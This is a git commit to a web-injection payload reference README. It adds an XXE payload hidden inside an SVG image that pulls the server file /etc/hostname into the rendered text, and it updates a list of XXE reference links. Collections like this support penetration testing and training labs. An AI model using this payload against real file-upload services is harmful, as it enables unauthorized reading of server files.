Add XXE payload inside SVG

Source: https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload
2024-05-11 05:26:19 +02:00 · 2019-09-17 16:23:14 +02:00 · 2019-09-17 16:23:14 +02:00 · 8822199f65
parent a0917241ad
commit 8822199f65
1 changed files with 9 additions and 1 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -298,6 +298,14 @@ Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
 </svg>
 ```

+```
+<?xml version="1.0" standalone="yes"?>
+<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
+<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
+   <text font-size="16" x="0" y="16">&xxe;</text>
+</svg>
+```
+
 ### XXE inside SOAP

 ```xml
@ -351,4 +359,4 @@ GIF (experimental)
 * [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
 * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html)
 * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
-* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
+* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)